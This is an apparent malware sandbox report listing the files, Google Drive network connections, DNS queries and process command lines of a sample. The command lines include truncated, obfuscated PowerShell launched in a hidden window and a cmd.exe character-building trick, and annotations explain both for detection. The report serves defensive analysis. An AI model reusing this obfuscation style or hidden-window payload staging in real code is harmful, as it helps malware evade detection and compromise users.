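Technical Information
(The section headings of the original report are missing from this copy. Entries that appear twice below, such as the temp files and the hosts, presumably belonged to separate sections, for example files created versus files deleted, or different connection types.)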
- %TEMP%\ideernes.txt
- %WINDIR%\temp\cab4bb0.tmp
- %WINDIR%\temp\tar4bc1.tmp
- %WINDIR%\temp\cab4d77.tmp
- %WINDIR%\temp\tar4d78.tmp
- %WINDIR%\temp\cab4bb0.tmp
- %WINDIR%\temp\tar4bc1.tmp
- %WINDIR%\temp\cab4d77.tmp
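- %WINDIR%\temp\tar4d78.tmp
  (Note: the cab*.tmp / tar*.tmp names resemble the scratch files Windows writes while retrieving certificate trust data, so they are probably a side effect of TLS validation rather than artifacts dropped by the sample. %TEMP%\ideernes.txt is the only file name here that looks specific to this sample.)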
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
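- DNS ASK drive.usercontent.google.com
  (Note: every host listed is a shared Google service, so the hostnames alone are not usable as block-list indicators. The '#' in 'pk#.goog' appears to be a character masked by the report. The gsr1/gsr1.crt request looks like certificate-chain retrieval for the TLS connections rather than a payload download. For detection, what matters is that a hidden powershell.exe process made the connections to the Google Drive hosts.)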
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Alfers Skabekrukkens Feather Receivable #>;$Unprofanely=(cmd /c set /A 115^^0);Function Kraniums ([String]$Peltless){$Unprofanely=[char][int]$Unprofanely;$Grasshopperish=$Unprofanely+'ubstri...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Alfers Skabekrukkens Feather Receivable #>;$Unprofanely=(cmd /c set /A 115^^0);Function Kraniums ([String]$Peltless){$Unprofanely=[char][int]$Unprofanely;$Grasshopperish=$Unprofanely+'ubstri...
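- '<SYSTEM32>\cmd.exe' /c set /A 115^^0
  (Note: this cmd.exe process is spawned by the PowerShell script above. `^^` is an escaped `^`, so `set /A` evaluates 115 XOR 0 = 115. The script casts that value to the character 's' and prepends it to 'ubstri...', presumably to build the method name "Substring" at run time so the literal never appears in the script text. A powershell.exe parent starting `cmd /c set /A <number>^^<number>` is a useful process-tree signal for this obfuscation style.)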